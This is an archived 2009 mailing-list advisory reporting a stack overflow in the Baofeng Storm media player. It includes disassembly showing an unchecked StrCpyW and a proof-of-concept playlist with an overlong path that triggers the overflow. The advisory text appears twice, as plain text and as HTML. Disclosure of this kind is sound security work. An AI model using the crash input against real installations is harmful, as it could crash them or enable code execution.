Baofeng Media Player playlist stack overflow vulnerability
By Jambalaya of Nevis Labs
Date: 2009.06.24
Vender:
Baofeng
Affected:
Storm 3.9.62
*Other version may also be affected
Overview:
Baofeng is a widely popular media player in China, and it plays many common
media file formats. There are almost 120 million customer using baofeng
media player in China.
Details:
The specific flaws exists in medialib.dll. the stack overflow vulnerablility
is due to the way it incorrectly handle smpl file type which is a
playlist.Succssfully exploiting this vulnerability allows attackers to
execute arbitrary code on vulnerable installation.
the vulnerability could be triggered when it pass a long path, and lack
legal examine on the length of path£º
.text:1000567B ; int __stdcall sub_1000567B(LPCWSTR pszUrl,DWORD pcchPath)
.text:1000567B sub_1000567B proc near ; DATA XREF:
.rdata:100248D4�o
.text:1000567B
.text:1000567B FileName = word ptr -628h
.text:1000567B var_10 = dword ptr -10h
.text:1000567B var_C = dword ptr -0Ch
.text:1000567B var_4 = dword ptr -4
.text:1000567B pszUrl = dword ptr 8
.text:1000567B pcchPath = dword ptr 0Ch
.text:1000567B
.text:1000567B mov eax, offset sub_100221F8
.text:10005680 call __EH_prolog
.text:10005685 sub esp, 61Ch
.text:1000568B push ebx
.text:1000568C push esi
.text:1000568D mov esi, [ebp+pszUrl]
.text:10005690 mov [ebp+var_10], ecx
.text:10005693 test esi, esi
.text:10005695 jz loc_1000577D
.text:1000569B mov ebx, [ebp+pcchPath]
.text:1000569E test ebx, ebx
.text:100056A0 jz loc_1000577D
.text:100056A6 push edi
.text:100056A7 push esi ; pszPath
.text:100056A8 xor edi, edi
.text:100056AA mov [ebp+pcchPath], 208h
.text:100056B1 call ds:PathIsURLW
.text:100056B7 test eax, eax
.text:100056B9 jz short loc_100056E0
.text:100056BB push 3 ; UrlIs
.text:100056BD push esi ; pszUrl
.text:100056BE call ds:UrlIsW
.text:100056C4 test eax, eax
.text:100056C6 jz short loc_100056E0
.text:100056E0 loc_100056E0: ; CODE XREF:
sub_1000567B+3E�j
.text:100056E0 ; sub_1000567B+4B�j
.text:100056E0 lea eax, [ebp+FileName]
.text:100056E6 push esi
.text:100056E7 push eax
.text:100056E8 call ds:StrCpyW
<---------------------strcpy directly with out any examiation.
Proof of concept£º
<playlist><item name="2.GIF" source="C:\Documents and
Settings\Linlin\ÀÃæ\2.GIF" duration="0"/><item name="0001.gif"
source="C:\Documents and
Settings\Linlin\ÀÃæ\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif" duration="0"/></playlist>
Greetz to those friends who I have long time no see T_T£ºPratik Dixit, Sanjay
pendse, Winny Thomas, ajit.hatti
Vendor Response:
2009.06.16 Vendor notified via email
2009.06.25 Vendor release new version
<div>Baofeng Media Player playlist stack overflowvulnerability</div><div><br></div><div>By Jambalaya of Nevis Labs</div><div>Date:2009.06.24</div><div><br></div><div><br></div><div>Vender:</div><div>Baofeng</div><div><br> </div><div>Affected:</div><div>Storm 3.9.62</div><div>*Other version may also> be affected</div><div><br></div><div>Overview:</div><div>Baofeng is a widely> popular media player in China, and it plays many common media file formats. There> are almost 120 million customer using baofeng media player in China.</div>
<div><br></div><div>Details:</div><div>The specific flaws exists in medialib.dll. thestack overflow vulnerablility is due to the way it incorrectly handle smpl file typewhich is a playlist.Succssfully exploiting this vulnerability allows attackers toexecute arbitrary code on vulnerable installation.</div> <div><br></div><div>thevulnerability could be triggered when it pass a long path, and lack legal examine onthe length of path£º</div><div><br></div><div>.text:1000567B ; int __stdcallsub_1000567B(LPCWSTR pszUrl,DWORD pcchPath)</div> <div>.text:1000567B sub_1000567B proc near ; DATA XREF:.rdata:100248D4 o</div><div>.text:1000567B</div><div>.text:1000567B FileName = word ptr -628h</div><div>.text:1000567B var_10 = dword ptr -10h</div> <div>.text:1000567B var_C = dword ptr -0Ch</div><div>.text:1000567B var_4 = dword ptr -4</div><div>.text:1000567B pszUrl = dword ptr 8</div><div>.text:1000567B pcchPath = dword ptr 0Ch</div><div>.text:1000567B</div><div>.text:1000567B mov eax, offsetsub_100221F8</div><div>.text:10005680 call __EH_prolog</div><div>.text:10005685 sub esp, 61Ch</div><div>
.text:1000568B push ebx</div><div>.text:1000568C push esi</div><div>.text:1000568D mov esi,[ebp+pszUrl]</div><div>.text:10005690 mov [ebp+var_10], ecx</div> <div>.text:10005693 test esi,esi</div><div>.text:10005695 jz loc_1000577D</div><div>.text:1000569B mov ebx,[ebp+pcchPath]</div><div>.text:1000569E test ebx, ebx</div> <div>.text:100056A0 jz loc_1000577D</div><div>.text:100056A6 push edi</div><div>.text:100056A7 push esi ; pszPath</div><div>.text:100056A8 xor edi, edi</div> <div>.text:100056AA mov [ebp+pcchPath],208h</div><div>.text:100056B1 call ds:PathIsURLW</div><div>.text:100056B7 test eax, eax</div><div>.text:100056B9 jz shortloc_100056E0</div> <div>.text:100056BB push 3 ;UrlIs</div><div>.text:100056BD push esi ;pszUrl</div><div>.text:100056BE call ds:UrlIsW</div><div>.text:100056C4 test eax, eax</div><div>.text:100056C6 jz short loc_100056E0</div><div>.text:100056E0 loc_100056E0: ; CODEXREF: sub_1000567B+3E j</div><div>.text:100056E0 ; sub_1000567B+4B j</div> <div>.text:100056E0 lea eax,[ebp+FileName]</div><div>.text:100056E6 push esi</div><div>.text:100056E7 push eax</div><div>.text:100056E8 call ds:StrCpyW <---------------------strcpy directly with out any examiation.</div><div><br></div><div>Proof of concept£º</div><div><playlist><itemname="2.GIF" source="C:\Documents and Settings\Linlin\ÀÃæ\2.GIF"duration="0"/><item name="0001.gif"source="C:\Documents andSettings\Linlin\ÀÃæ\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif"duration="0"/></playlist></div><div><br></div><div><br></div><div>Greetz to those friends who I have long time nosee T_T£ºPratik Dixit, Sanjay pendse, Winny Thomas,ajit.hatti</div><div><br></div><div>Vendor Response:</div><div>2009.06.16 Vendornotified via email</div> <div>2009.06.25 Vendor release new version</div>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
<b>[prev in list] [next in list] [<font color="#c0c0c0">prev in thread</font>] [next in thread] </b>
</pre>
</pre><br><center>
Configure |
About |
News |
Donate |
Addalist |
Sponsors:10East,KoreLogic,Terra-International,Chakpak.com
</center>
</body>
</html>
